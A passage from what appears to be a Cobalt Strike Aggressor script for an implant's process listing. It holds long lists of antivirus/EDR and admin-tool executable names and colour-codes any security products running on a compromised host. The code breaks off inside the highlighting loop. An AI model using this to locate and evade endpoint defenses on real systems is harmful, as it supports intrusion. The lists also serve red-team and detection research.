"Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", "PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", "PavPrSrv.exe", "PavProt.exe", "PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", "RPCServ.exe", "RSSensor.exe", "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", "SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", "TSAnSrf.exe", "TSAtiSy.exe", "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", "UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", "ants.exe", "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", "avadmin.exe", "avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", "avgnsx.exe", "avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", "backweb.exe", "bargains.exe", "basfipm.exe", "bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", "ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", "cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", "dllreg.exe", "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", "drweb386.exe", "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", "evtProcessEcFile.exe", "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", "fortifw.exe", "fp-win.exe", "fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", "hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", "inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", "kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe", "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe", "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", "kis.exe", "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe", "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe", "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe", "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe", "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", "lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe", "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", "mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe", "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe", "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe", "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe", "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe", "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe", "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe", "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", "msmsgri32.exe", "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe", "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe", "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe");
11 | @av1 = @("MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe", "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe", "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe", "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", "nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe", "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe", "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe", "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe", "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe", "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe", "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe", "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe", "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe", "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe", "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", "periscope.exe", "persfw.exe", "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe", "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe", "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", "prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe", "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe", "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe", "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe", "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe", "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe", "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe", "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe", "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe", "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe", "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", "spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe", "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe", "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe", "svcGenericHost", "svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe", "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe", "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe", "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe", "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe", "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe", "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe", "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe", "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe", "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe", "vsmain.exe", "vsmon.exe", "vsserv.exe", "vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe", "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe", "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", "winrecon.exe", "winroute.exe", "winservn.exe", "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe", "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe", "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe", "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe","CrAmTray.exe","AmSvc.exe","minionhost.exe","PylumLoader.exe","CrsSvc.exe");
12 | @admin = @("MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe", "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe", "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe", "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe", "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe", "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe", "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe", "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe", "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe", "ldmdump.exe", "Listdlls.exe", "Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe", "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe", "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe", "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe", "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", "pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe", "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe", "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe", "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe", "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe", "KeePass.exe", "1Password.exe", "lastpass.exe");
13 |
14 | local('$outps $temp $name $ppid $pid $arch $user $session @ps');
15 | $outps .= "\cC[*]\o Process List with process highlighting\n";
16 | $outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $bd['pid'] ." \o \n";
17 | $outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n";
18 | $outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n";
19 | $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n";
20 | $outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n";
21 | $outps .= " PID PPID Name Arch Session User\n";
22 | $outps .= "\cE --- ---- ---- ---- ------- -----\n";
23 |
24 | foreach $temp (split("\n", ["$2" trim])) {
25 | ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp);
26 | # highlight AV processes in RED.
27 | if(iff($name in @av,true,false)) {
